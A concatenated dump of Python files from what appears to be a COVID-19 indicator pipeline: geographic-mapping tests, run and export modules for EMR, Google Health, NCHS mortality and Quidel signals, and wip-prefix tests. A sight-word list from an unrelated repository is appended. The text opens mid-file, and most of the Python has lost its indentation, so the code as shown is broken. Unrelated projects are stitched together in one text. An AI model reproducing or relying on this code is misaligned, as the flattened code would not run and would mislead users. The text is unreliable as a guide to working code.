self.mega_data_2, 6, 50, thr_col="_thr_col_roll"
)
new_data = gmpr.fips_to_megacounty(
self.mega_data, 6, 50, count_cols=["count", "visits"]
)
assert (
new_data[["count"]].sum() - self.mega_data[["count"]].sum()
).sum() < 1e-3
def test_zip_to_hrr(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_hrr(self.zip_data)
assert len(pd.unique(new_data["hrr"])) == 2
assert np.allclose(
new_data[["count", "total"]].sum(), self.zip_data[["count", "total"]].sum()
)
def test_jhu_uid_to_fips(self):
gmpr = GeoMapper()
new_data = gmpr.jhu_uid_to_fips(self.jhu_uid_data)
assert not (new_data["fips"].astype(int) > 90000).any()
assert new_data["total"].sum() == self.jhu_uid_data["total"].sum()
def test_fips_to_zip(self):
gmpr = GeoMapper()
new_data = gmpr.fips_to_zip(self.fips_data_4)
assert new_data["count"].sum() == self.fips_data_4["count"].sum()
def test_fips_to_hrr(self):
gmpr = GeoMapper()
data = gmpr.convert_fips_to_hrr(self.fips_data_3)
ind = self.fips_data_3["fips"].isin(data["fips"])
data = self.fips_data_3[ind]
new_data = gmpr.fips_to_hrr(self.fips_data_3)
assert new_data.shape == (2, 4)
assert new_data["count"].sum() == data["count"].sum()
def test_zip_to_msa(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_msa(self.zip_data)
assert new_data["msa"][2] == "46700"
assert new_data.shape[0] == 6
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_zip_to_state_code(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_state_code(self.zip_data)
assert new_data.shape[0] == 4
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_zip_to_state_id(self):
gmpr = GeoMapper()
new_data = gmpr.zip_to_state_id(self.zip_data)
assert new_data.shape[0] == 4
assert np.allclose(new_data["count"].sum(), self.zip_data["count"].sum())
def test_add_population_column(self):
gmpr = GeoMapper()
new_data = gmpr.add_population_column(self.fips_data_3, "fips")
assert new_data.shape == (5, 5)
new_data = gmpr.add_population_column(self.zip_data, "zip")
assert new_data.shape == (6, 5)
with pytest.raises(ValueError):
new_data = gmpr.add_population_column(self.zip_data, "hrr")
new_data = gmpr.add_population_column(self.fips_data_5, "fips")
assert new_data.shape == (4, 5)
def test_add_geocode(self):
gmpr = GeoMapper()
# fips -> zip
new_data = gmpr.fips_to_zip(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "zip")
assert new_data.equals(new_data2)
# fips -> hrr
new_data = gmpr.fips_to_hrr(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "hrr")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> msa
new_data = gmpr.fips_to_msa(self.fips_data_3)
new_data2 = gmpr.replace_geocode(self.fips_data_3, "fips", "msa")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_id
new_data = gmpr.fips_to_state_id(self.fips_data_4)
new_data2 = gmpr.replace_geocode(self.fips_data_4, "fips", "state_id")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_code
new_data = gmpr.fips_to_state_code(self.fips_data_4)
new_data2 = gmpr.replace_geocode(self.fips_data_4, "fips", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# fips -> state_code (again, mostly to cover the test case of when fips
# codes aren't all strings)
new_data = gmpr.fips_to_state_code(self.fips_data_5)
new_data2 = gmpr.replace_geocode(self.fips_data_5, "fips", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> fips
new_data = gmpr.zip_to_fips(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "fips")
new_data2 = new_data2[new_data.columns]
assert new_data.equals(new_data2)
# zip -> hrr
new_data = gmpr.zip_to_hrr(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "hrr")
new_data2 = new_data2[new_data.columns]
assert new_data.equals(new_data2)
# zip -> msa
new_data = gmpr.zip_to_msa(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "msa")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> state_id
new_data = gmpr.zip_to_state_id(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "state_id")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# zip -> state_code
new_data = gmpr.zip_to_state_code(self.zip_data)
new_data2 = gmpr.replace_geocode(self.zip_data, "zip", "state_code")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# jhu_uid -> fips
new_data = gmpr.jhu_uid_to_fips(self.jhu_uid_data)
new_data2 = gmpr.replace_geocode(self.jhu_uid_data, "jhu_uid", "fips")
new_data2 = new_data2[new_data.columns]
assert np.allclose(
new_data[["count", "total"]].values, new_data2[["count", "total"]].values
)
# state_code -> hhs
new_data = gmpr.add_geocode(self.zip_data, "zip", "state_code")
new_data2 = gmpr.add_geocode(new_data, "state_code", "hhs_region_number")
assert new_data2["hhs_region_number"].unique().size == 2
# state_name -> state_id
new_data = gmpr.replace_geocode(self.zip_data, "zip", "state_name")
new_data2 = gmpr.add_geocode(new_data, "state_name", "state_id")
assert new_data2.shape == (4, 5)
new_data2 = gmpr.replace_geocode(new_data, "state_name", "state_id", new_col="abbr")
assert "abbr" in new_data2.columns
# fips -> nation
new_data = gmpr.replace_geocode(self.fips_data_5, "fips", "nation", new_col="NATION")
assert new_data.equals(
pd.DataFrame().from_dict(
{
"date": {0: pd.Timestamp("2018-01-01 00:00:00")},
"NATION": {0: "us"},
"count": {0: 10024.0},
"total": {0: 100006.0},
}
)
)
# zip -> nation
new_data = gmpr.replace_geocode(self.zip_data, "zip", "nation")
assert new_data.equals(
pd.DataFrame().from_dict(
{
"date": {
0: pd.Timestamp("2018-01-01"),
1: pd.Timestamp("2018-01-03"),
},
"nation": {0: "us", 1: "us"},
"count": {0: 900, 1: 886},
"total": {0: 1800, 1: 1772},
}
)
)
# hrr -> nation
with pytest.raises(ValueError):
new_data = gmpr.replace_geocode(self.zip_data, "zip", "hrr")
new_data2 = gmpr.replace_geocode(new_data, "hrr", "nation")
# fips -> hrr (dropna=True/False check)
assert not gmpr.add_geocode(self.fips_data_3, "fips", "hrr").isna().any().any()
assert gmpr.add_geocode(self.fips_data_3, "fips", "hrr", dropna=False).isna().any().any()
# fips -> hrr (date_col=None check)
new_data = gmpr.replace_geocode(self.fips_data_5.drop(columns=["date"]), "fips", "hrr", date_col=None)
assert new_data.equals(
pd.DataFrame().from_dict(
{
'hrr': {0: '1', 1: '183', 2: '184', 3: '382', 4: '7'},
'count': {0: 1.772347174163783, 1: 7157.392403522299, 2: 2863.607596477701, 3: 1.0, 4: 0.22765282583621685},
'total': {0: 3.544694348327566, 1: 71424.64801363471, 2: 28576.35198636529, 3: 1.0, 4: 0.4553056516724337}
}
)
)
```
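The fixtures above all exercise the same entry points; a compact stand-alone use of `GeoMapper` (the frame mirrors `fips_data_3`, and the call needs the crosswalk files bundled with the package):
```python
import pandas as pd
from delphi_utils.geomap import GeoMapper

df = pd.DataFrame({
    "fips": ["48059", "48253", "48441"],      # three Texas counties
    "date": [pd.Timestamp("2018-01-01")] * 3,
    "count": [1, 2, 3],
})
gmpr = GeoMapper()
state_df = gmpr.replace_geocode(df, "fips", "state_id")  # sums counts into "tx"
print(state_df)
```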
#### File: emr_hosp/delphi_emr_hosp/run.py
```python
import logging
from datetime import datetime, timedelta
from pathlib import Path
# third party
from delphi_utils import read_params
# first party
from .update_sensor import EMRHospSensorUpdator
def run_module():
"""Run the delphi_emr_hosp module.
"""
params = read_params()
logging.basicConfig(level=logging.DEBUG)
## get end date from input file
# the filenames are expected to be in the format:
# EMR: "ICUE_CMB_INPATIENT_DDMMYYYY.csv.gz"
# CLAIMS: "EDI_AGG_INPATIENT_DDMMYYYY_HHMM{timezone}.csv.gz"
if params["drop_date"] is None:
dropdate_emr = datetime.strptime(
Path(params["input_emr_file"]).name.split("_")[3].split(".")[0], "%d%m%Y"
)
dropdate_claims = datetime.strptime(
Path(params["input_claims_file"]).name.split("_")[3], "%d%m%Y"
)
assert dropdate_emr == dropdate_claims, "different drop dates for data streams"
dropdate_dt = dropdate_claims
else:
dropdate_dt = datetime.strptime(params["drop_date"], "%Y-%m-%d")
dropdate = str(dropdate_dt.date())
# range of estimates to produce
n_backfill_days = params["n_backfill_days"] # produce estimates for n_backfill_days
n_waiting_days = params["n_waiting_days"] # most recent n_waiting_days won't be est
enddate_dt = dropdate_dt - timedelta(days=n_waiting_days)
startdate_dt = enddate_dt - timedelta(days=n_backfill_days)
enddate = str(enddate_dt.date())
startdate = str(startdate_dt.date())
# now allow manual overrides
if params["end_date"] is not None:
enddate = params["end_date"]
if params["start_date"] is not None:
startdate = params['start_date']
logging.info("first sensor date:\t%s", startdate)
logging.info("last sensor date:\t%s", enddate)
logging.info("drop date:\t\t%s", dropdate)
logging.info("n_backfill_days:\t%s", n_backfill_days)
logging.info("n_waiting_days:\t%s", n_waiting_days)
## print out other vars
logging.info("geos:\t\t\t%s", params["geos"])
logging.info("outpath:\t\t%s", params["export_dir"])
logging.info("parallel:\t\t%s", params["parallel"])
logging.info("weekday:\t\t%s", params["weekday"])
logging.info("se:\t\t\t%s", params["se"])
## start generating
for geo in params["geos"]:
for weekday in params["weekday"]:
if weekday:
logging.info("starting %s, weekday adj", geo)
else:
logging.info("starting %s, no adj", geo)
su_inst = EMRHospSensorUpdator(
startdate,
enddate,
dropdate,
geo,
params["parallel"],
weekday,
params["se"]
)
su_inst.update_sensor(
params["input_emr_file"],
params["input_claims_file"],
params["export_dir"],
params["static_file_dir"]
)
logging.info("finished %s", geo)
logging.info("finished all")
```
#### File: google_health/delphi_google_health/export.py
```python
import numpy as np
import pandas as pd
from .smooth import smoothed_values_by_geo_id
RESCALE_VAL = 4000 / 100
def export_csv(
df: pd.DataFrame, geo_name: str, sensor: str, smooth: bool, receiving_dir: str
) -> None:
"""Export data set in format expected for injestion by the API
Note that the output values will be multiplied by the value RESCALE_VAL
defined in this file.
Parameters
----------
df: pd.DataFrame
data frame with columns "geo_id", "timestamp", and "val"
geo_name: str
name of the geographic region, such as "state" or "hrr"
sensor: str
name of the sensor; only used for naming the output file
smooth: bool
should the signal in "val" be smoothed?
receiving_dir: str
path to location where the output CSV files to be uploaded should be stored
"""
df = df.copy()
if smooth:
df["val"] = smoothed_values_by_geo_id(df)
df["val"] /= RESCALE_VAL
df["se"] = np.nan
df["sample_size"] = np.nan
for date in df["timestamp"].unique():
date_short = date.replace("-", "")
export_fn = f"{date_short}_{geo_name}_{sensor}.csv"
df[df["timestamp"] == date][["geo_id", "val", "se", "sample_size"]].to_csv(
f"{receiving_dir}/{export_fn}",
index=False,
na_rep="NA",
float_format="%.8f",
)
```
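`export_csv` expects one row per (geo_id, timestamp) pair and writes one file per day. A sketch writing into a temporary directory (the sensor name and values are made up):
```python
import tempfile
import pandas as pd
from delphi_google_health.export import export_csv  # assumes package is installed

df = pd.DataFrame({
    "geo_id": ["ca", "ny", "ca", "ny"],
    "timestamp": ["2020-05-01", "2020-05-01", "2020-05-02", "2020-05-02"],
    "val": [1.0, 2.0, 3.0, 4.0],  # made-up values, rescaled by RESCALE_VAL on export
})
with tempfile.TemporaryDirectory() as out_dir:
    export_csv(df, geo_name="state", sensor="raw_search", smooth=False,
               receiving_dir=out_dir)
    # writes 20200501_state_raw_search.csv and 20200502_state_raw_search.csv
```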
#### File: google_health/delphi_google_health/run.py
```python
import datetime
import logging
from delphi_utils import (
read_params,
S3ArchiveDiffer
)
import covidcast
from .pull_api import GoogleHealthTrends, get_counts_states, get_counts_dma
from .map_values import derived_counts_from_dma
from .export import export_csv
from .constants import SIGNALS, RAW, SMOOTHED, MSA, HRR, STATE, DMA
def run_module():
"""Main function run when calling the module.
Reads parameters from the file 'params.json' and produces output data in
the directory defined by the `export_dir` (should be "receiving" except for
testing purposes).
"""
# read parameters
params = read_params()
ght_key = params["ght_key"]
start_date = params["start_date"]
end_date = params["end_date"]
static_dir = params["static_file_dir"]
export_dir = params["export_dir"]
data_dir = params["data_dir"]
wip_signal = params["wip_signal"]
cache_dir = params["cache_dir"]
arch_diff = S3ArchiveDiffer(
cache_dir, export_dir,
params["bucket_name"], "ght",
params["aws_credentials"])
arch_diff.update_cache()
print(arch_diff)
# if missing start_date, set to today (GMT) minus 4 days
if start_date == "":
now = datetime.datetime.now(datetime.timezone.utc)
start_date = (now - datetime.timedelta(days=4)).strftime("%Y-%m-%d")
# if missing end_date, set to today (GMT) minus 4 days
if end_date == "":
now = datetime.datetime.now(datetime.timezone.utc)
end_date = (now - datetime.timedelta(days=4)).strftime("%Y-%m-%d")
# Turn on basic logging messages (level INFO)
logging.basicConfig(format="%(levelname)s:%(message)s", level=logging.INFO)
logging.info("Creating data from %s through %s.", start_date, end_date)
# setup class to handle API calls
ght = GoogleHealthTrends(ght_key=ght_key)
# read data frame version of the data
df_state = get_counts_states(
ght, start_date, end_date, static_dir=static_dir, data_dir=data_dir
)
df_dma = get_counts_dma(
ght, start_date, end_date, static_dir=static_dir, data_dir=data_dir
)
df_hrr, df_msa = derived_counts_from_dma(df_dma, static_dir=static_dir)
signal_names = add_prefix(SIGNALS, wip_signal, prefix="wip_")
for signal in signal_names:
if signal.endswith(SMOOTHED):
# export each geographic region, with both smoothed and unsmoothed data
export_csv(df_state, STATE, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_dma, DMA, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_hrr, HRR, signal, smooth=True, receiving_dir=export_dir)
export_csv(df_msa, MSA, signal, smooth=True, receiving_dir=export_dir)
elif signal.endswith(RAW):
export_csv(df_state, STATE, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_dma, DMA, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_hrr, HRR, signal, smooth=False, receiving_dir=export_dir)
export_csv(df_msa, MSA, signal, smooth=False, receiving_dir=export_dir)
# Diff exports, and make incremental versions
_, common_diffs, new_files = arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = arch_diff.archive_exports(to_archive)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive '{exported_file}'")
def add_prefix(signal_names, wip_signal, prefix):
"""Adds prefix to signal if there is a WIP signal
Parameters
----------
signal_names: List[str]
Names of signals to be exported
wip_signal : List[str] or bool
a list of wip signals: [], OR
all signals in the registry: True OR
only signals that have never been published: False
prefix : 'wip_'
prefix for new/non public signals
Returns
-------
List of signal names
wip/non wip signals for further computation
"""
if wip_signal is True:
return [prefix + signal for signal in signal_names]
if isinstance(wip_signal, list):
make_wip = set(wip_signal)
return [
(prefix if signal in make_wip else "") + signal
for signal in signal_names
]
if wip_signal in {False, ""}:
return [
signal if public_signal(signal)
else prefix + signal
for signal in signal_names
]
raise ValueError("Supply True | False or '' or [] | list()")
def public_signal(signal_):
"""Checks if the signal name is already public using COVIDcast
Parameters
----------
signal_ : str
Name of the signal
Returns
-------
bool
True if the signal is present
False if the signal is not present
"""
epidata_df = covidcast.metadata()
for index in range(len(epidata_df)):
if epidata_df['signal'][index] == signal_:
return True
return False
```
#### File: google_health/tests/test_smooth.py
```python
import pytest
from os.path import join
import numpy as np
import pandas as pd
from delphi_google_health.smooth import smoothed_values_by_geo_id, _left_gauss_linear
class TestSmoothedValues:
def test_smooth(self):
df = pd.DataFrame(
{
"geo_id": ["a", "a", "a", "a", "b", "b", "b"],
"timestamp": [
"2020-02-01",
"2020-02-02",
"2020-02-03",
"2020-02-04",
"2020-02-01",
"2020-02-02",
"2020-02-03",
],
"val": np.array([0, 1, 2, 2, 1, 3, 7]),
}
)
smoothed = smoothed_values_by_geo_id(df)
direct_call = np.append(
_left_gauss_linear(df["val"][0:4].values, impute=True, minval=0),
_left_gauss_linear(df["val"][4:7].values, impute=True, minval=0),
)
assert np.allclose(smoothed, direct_call)
class TestSmoother:
def test_gauss_linear(self):
signal = np.ones(10)
assert np.allclose(_left_gauss_linear(signal, impute=True), signal)
assert np.all(
_left_gauss_linear(signal, impute=True, minval=2) == 2 * np.ones(10)
)
signal = np.arange(10)
assert np.allclose(_left_gauss_linear(signal, impute=True), signal)
```
#### File: jhu/tests/compare_receiving.py
```python
import pandas as pd
import os
rec_pattern = ""
# rec_pattern = "county_deaths_incidence_num"
def load_files(pattern = "", num = 1000):
rec_dir = os.listdir('../receiving')
suff = "stable"
rec_stable_dir = os.listdir(f'../receiving_{suff}')
    rec_common = [f for f in set(rec_dir) & set(rec_stable_dir) if pattern in f]
print(set(rec_dir).symmetric_difference(rec_stable_dir))
num_iter = 0
for rec in rec_common:
if num_iter <= num:
num_iter += 1
df_rec = pd.read_csv(f'../receiving/{rec}').set_index('geo_id')
df_stable = pd.read_csv(f'../receiving_{suff}/{rec}').set_index('geo_id')
try:
df_join = df_rec.join(df_stable, rsuffix='_stable' )
            except Exception:
print(df_rec.info())
print(df_stable.info())
assert False, f"failed join on {rec}"
yield rec, df_join
def main():
load_iter = load_files(rec_pattern)
for rec, df in load_iter:
if ('msa' in rec) and False:
msa_ds = (df['val'] - df['val_stable']).sum()
print(f'{msa_ds} value diff')
if (df.eval('abs(val - val_stable)').sum() > 0.01):
print(f'Printing {rec} difference')
df_diff = df[df.eval('val != val_stable')]
print(df_diff.shape)
df_diff.to_csv(f'rec_diffs/diff_{rec}.csv')
# assert "county_confirmed_7dav_incidence_num" not in rec, f"{rec}!!!"
#input('w')
if __name__ == "__main__":
main()
```
#### File: nchs_mortality/delphi_nchs_mortality/export.py
```python
import pandas as pd
from epiweeks import Week
def export_csv(df, geo_name, sensor, export_dir, start_date):
"""Export data set in format expected for injestion by the API.
Parameters
----------
df: pd.DataFrame
data frame with columns "geo_id", "timestamp", and "val"
geo_name: str
name of the geographic region, such as "state" or "hrr"
sensor: str
name of the sensor; only used for naming the output file
export_dir: str
path to location where the output CSV files to be uploaded should be stored
start_date: datetime.datetime
The first date to report
"""
df = df.copy()
df = df[df["timestamp"] >= start_date]
for date in df["timestamp"].unique():
t = Week.fromdate(pd.to_datetime(str(date)))
date_short = "weekly_" + str(t.year) + str(t.week + 1).zfill(2)
export_fn = f"{date_short}_{geo_name}_{sensor}.csv"
result_df = df[df["timestamp"] == date][["geo_id", "val", "se", "sample_size"]]
result_df.to_csv(f"{export_dir}/{export_fn}",
index=False,
float_format="%.8f")
```
#### File: nchs_mortality/delphi_nchs_mortality/run.py
```python
from datetime import datetime, date, timedelta
from os.path import join
from os import remove, listdir
from shutil import copy
import numpy as np
import pandas as pd
from delphi_utils import read_params, S3ArchiveDiffer
from .pull import pull_nchs_mortality_data
from .export import export_csv
# global constants
METRICS = [
'covid_deaths', 'total_deaths', 'percent_of_expected_deaths',
'pneumonia_deaths', 'pneumonia_and_covid_deaths', 'influenza_deaths',
'pneumonia_influenza_or_covid_19_deaths'
]
SENSORS = [
"num",
"prop"
]
INCIDENCE_BASE = 100000
geo_res = "state"
def run_module():
"""Run module for processing NCHS mortality data."""
params = read_params()
export_start_date = params["export_start_date"]
if export_start_date == "latest": # Find the previous Saturday
export_start_date = date.today() - timedelta(
days=date.today().weekday() + 2)
export_start_date = export_start_date.strftime('%Y-%m-%d')
export_dir = params["export_dir"]
daily_export_dir = params["daily_export_dir"]
cache_dir = params["cache_dir"]
daily_cache_dir = params["daily_cache_dir"]
static_file_dir = params["static_file_dir"]
token = params["token"]
test_mode = params["mode"]
daily_arch_diff = S3ArchiveDiffer(
daily_cache_dir, daily_export_dir,
params["bucket_name"], "nchs_mortality",
params["aws_credentials"])
daily_arch_diff.update_cache()
map_df = pd.read_csv(
join(static_file_dir, "state_pop.csv"), dtype={"fips": int}
)
df = pull_nchs_mortality_data(token, map_df, test_mode)
for metric in METRICS:
if metric == 'percent_of_expected_deaths':
print(metric)
df["val"] = df[metric]
df["se"] = np.nan
df["sample_size"] = np.nan
sensor_name = "_".join(["wip", metric])
export_csv(
df,
geo_name=geo_res,
export_dir=daily_export_dir,
start_date=datetime.strptime(export_start_date, "%Y-%m-%d"),
sensor=sensor_name,
)
else:
for sensor in SENSORS:
print(metric, sensor)
if sensor == "num":
df["val"] = df[metric]
else:
df["val"] = df[metric] / df["population"] * INCIDENCE_BASE
df["se"] = np.nan
df["sample_size"] = np.nan
sensor_name = "_".join(["wip", metric, sensor])
export_csv(
df,
geo_name=geo_res,
export_dir=daily_export_dir,
start_date=datetime.strptime(export_start_date, "%Y-%m-%d"),
sensor=sensor_name,
)
# Weekly run of archive utility on Monday
# - Does not upload to S3, that is handled by daily run of archive utility
# - Exports issues into receiving for the API
if datetime.today().weekday() == 0:
        # Copy today's raw output to receiving
for output_file in listdir(daily_export_dir):
copy(
join(daily_export_dir, output_file),
join(export_dir, output_file))
weekly_arch_diff = S3ArchiveDiffer(
cache_dir, export_dir,
params["bucket_name"], "nchs_mortality",
params["aws_credentials"])
        # Don't update cache from S3 (it has daily files); only simulate an update_cache() call
weekly_arch_diff._cache_updated = True
# Diff exports, and make incremental versions
_, common_diffs, new_files = weekly_arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = weekly_arch_diff.archive_exports(to_archive, update_s3=False)
# Filter existing exports to exclude those that failed to archive
succ_common_diffs = {f: diff for f, diff in common_diffs.items() if f not in fails}
weekly_arch_diff.filter_exports(succ_common_diffs)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive (weekly) '{exported_file}'")
# Daily run of archiving utility
# - Uploads changed files to S3
# - Does not export any issues into receiving
# Diff exports, and make incremental versions
_, common_diffs, new_files = daily_arch_diff.diff_exports()
# Archive changed and new files only
to_archive = [f for f, diff in common_diffs.items() if diff is not None]
to_archive += new_files
_, fails = daily_arch_diff.archive_exports(to_archive)
# Daily output not needed anymore, remove them
for exported_file in new_files:
remove(exported_file)
for exported_file, diff_file in common_diffs.items():
remove(exported_file)
remove(diff_file)
# Report failures: someone should probably look at them
for exported_file in fails:
print(f"Failed to archive (daily) '{exported_file}'")
```
#### File: nchs_mortality/tests/test_pull.py
```python
import pytest
from os.path import join
import pandas as pd
from delphi_utils import read_params
from delphi_nchs_mortality.pull import pull_nchs_mortality_data
params = read_params()
export_start_date = params["export_start_date"]
export_dir = params["export_dir"]
static_file_dir = params["static_file_dir"]
token = params["token"]
map_df = pd.read_csv(
join(static_file_dir, "state_pop.csv"), dtype={"fips": int}
)
class TestPullNCHS:
def test_good_file(self):
df = pull_nchs_mortality_data(token, map_df, "test_data.csv")
assert (df.columns.values == [
'covid_deaths', 'total_deaths', 'percent_of_expected_deaths',
'pneumonia_deaths', 'pneumonia_and_covid_deaths',
'influenza_deaths', 'pneumonia_influenza_or_covid_19_deaths',
"timestamp", "geo_id", "population"]).all()
def test_bad_file_with_inconsistent_time_col(self):
with pytest.raises(ValueError):
df = pull_nchs_mortality_data(token, map_df,
"bad_data_with_inconsistent_time_col.csv")
    def test_bad_file_with_missing_cols(self):
with pytest.raises(ValueError):
df = pull_nchs_mortality_data(token, map_df,
"bad_data_with_missing_cols.csv")
```
#### File: quidel/delphi_quidel/run.py
```python
from os.path import join
import pandas as pd
from delphi_utils import read_params
from .geo_maps import geo_map
from .pull import (pull_quidel_data,
check_export_start_date,
check_export_end_date,
update_cache_file)
from .export import export_csv
from .generate_sensor import (generate_sensor_for_states,
generate_sensor_for_other_geores)
from .constants import (END_FROM_TODAY_MINUS, EXPORT_DAY_RANGE,
GEO_RESOLUTIONS, SENSORS)
from .handle_wip_sensor import add_prefix
def run_module():
params = read_params()
cache_dir = params["cache_dir"]
export_dir = params["export_dir"]
static_file_dir = params["static_file_dir"]
export_start_dates = params["export_start_date"]
export_end_dates = params["export_end_date"]
map_df = pd.read_csv(
join(static_file_dir, "fips_prop_pop.csv"), dtype={"fips": int}
)
# Pull data and update export date
dfs, _end_date = pull_quidel_data(params)
if _end_date is None:
print("The data is up-to-date. Currently, no new data to be ingested.")
return
export_end_dates = check_export_end_date(export_end_dates, _end_date,
END_FROM_TODAY_MINUS)
export_start_dates = check_export_start_date(export_start_dates,
export_end_dates,
EXPORT_DAY_RANGE)
# Add prefix, if required
sensors = add_prefix(list(SENSORS.keys()),
wip_signal=params["wip_signal"],
prefix="wip_")
for sensor in sensors:
# Check either covid_ag or flu_ag
test_type = "covid_ag" if "covid_ag" in sensor else "flu_ag"
print("state", sensor)
data = dfs[test_type].copy()
state_groups = geo_map("state", data, map_df).groupby("state_id")
first_date, last_date = data["timestamp"].min(), data["timestamp"].max()
# For State Level
state_df = generate_sensor_for_states(
state_groups, smooth=SENSORS[sensor][1],
device=SENSORS[sensor][0], first_date=first_date,
last_date=last_date)
export_csv(state_df, "state", sensor, receiving_dir=export_dir,
start_date=export_start_dates[test_type],
end_date=export_end_dates[test_type])
# County/HRR/MSA level
for geo_res in GEO_RESOLUTIONS:
print(geo_res, sensor)
data = dfs[test_type].copy()
data, res_key = geo_map(geo_res, data, map_df)
res_df = generate_sensor_for_other_geores(
state_groups, data, res_key, smooth=SENSORS[sensor][1],
device=SENSORS[sensor][0], first_date=first_date,
last_date=last_date)
export_csv(res_df, geo_res, sensor, receiving_dir=export_dir,
start_date=export_start_dates[test_type],
end_date=export_end_dates[test_type])
# Export the cache file if the pipeline runs successfully.
# Otherwise, don't update the cache file
update_cache_file(dfs, _end_date, cache_dir)
```
#### File: quidel/tests/test_handle_wip_sensor.py
```python
import unittest
from delphi_quidel.handle_wip_sensor import add_prefix
from delphi_quidel.constants import SENSORS
class MyTestCase(unittest.TestCase):
def test_handle_wip_sensor(self):
# Test wip_signal = True, Add prefix to all signals
sensors = list(SENSORS.keys())
signal_names = add_prefix(sensors, True, prefix="wip_")
assert all(s.startswith("wip_") for s in signal_names)
# Test wip_signal = list, Add prefix to signal list
signal_names = add_prefix(sensors, [sensors[0]], prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
# Test wip_signal = False, Add prefix to unpublished signals
signal_names = add_prefix(["xyzzy", sensors[0]], False, prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
if __name__ == '__main__':
unittest.main()
```
#### File: _template_python/tests/test_handle_wip_signal.py
```python
import unittest
from delphi_NAME.handle_wip_signal import add_prefix
from delphi_NAME.run import SIGNALS
from delphi_utils import read_params
def test_handle_wip_signal():
# Test wip_signal = True (all signals should receive prefix)
signal_names = add_prefix(SIGNALS, True, prefix="wip_")
assert all(s.startswith("wip_") for s in signal_names)
# Test wip_signal = list (only listed signals should receive prefix)
signal_names = add_prefix(SIGNALS, [SIGNALS[0]], prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
# Test wip_signal = False (only unpublished signals should receive prefix)
signal_names = add_prefix(["xyzzy", SIGNALS[0]], False, prefix="wip_")
assert signal_names[0].startswith("wip_")
assert all(not s.startswith("wip_") for s in signal_names[1:])
class MyTestCase(unittest.TestCase):
pass
if __name__ == '__main__':
unittest.main()
```
|
{
"source": "JedGStumpf/Sightwords",
"score": 4
}
|
#### File: JedGStumpf/Sightwords/sightlists.py
```python
import random
sight_list_1 = ['the', 'of', 'and', 'a', 'to', 'in', 'is', 'you', 'that', 'it', 'he', 'was', 'for', 'on', 'are', 'as', 'with', 'his', 'they', 'I', 'at', 'be', 'this', 'have', 'from', 'or', 'one', 'had', 'by', 'word', 'but', 'not', 'what', 'all', 'we\'re', 'we', 'when', 'your', 'can', 'said', 'there', 'use', 'an', 'each', 'which', 'she', 'do', 'how', 'their', 'if']
sight_list_2 = ['will', 'up', 'other', 'about', 'out', 'many', 'then', 'them', 'these', 'so', 'some', 'her', 'would', 'make', 'like', 'him', 'into', 'time', 'has', 'look', 'two', 'more', 'write', 'go', 'see', 'number', 'no', 'way', 'could', 'people', 'my', 'than', 'first', 'water', 'been', 'call', 'who', 'oil', 'now', 'find', 'long', 'down', 'day', 'did', 'get', 'come','made', 'may', 'part', 'over']
sight_list_3 = ['new', 'sound', 'take', 'only', 'little', 'work', 'know', 'place', 'year', 'live', 'me', 'back','give', 'most', 'very', 'after', 'thing', 'our', 'just', 'name', 'good', 'sentence', 'man', 'think', 'say', 'great', 'where', 'help', 'through', 'much', 'before', 'line', 'right', 'too', 'mean', 'old', 'any', 'same', 'tell', 'boy', 'follow', 'came', 'want', 'show', 'also', 'around', 'farm', 'three', 'small', 'set']
sight_list_4 = ['put', 'end', 'does', 'another', 'well', 'large', 'must', 'big', 'even', 'such', 'because', 'turn', 'here', 'why', 'ask', 'went', 'men', 'read', 'need', 'land', 'different', 'home', 'us', 'move', 'try', 'kind', 'hand', 'picture', 'again', 'change', 'off', 'play', 'spell', 'air', 'away', 'animal', 'house', 'point', 'page', 'letter', 'mother', 'answer', 'found', 'study', 'still', 'learn', 'should', 'America', 'world', 'high']
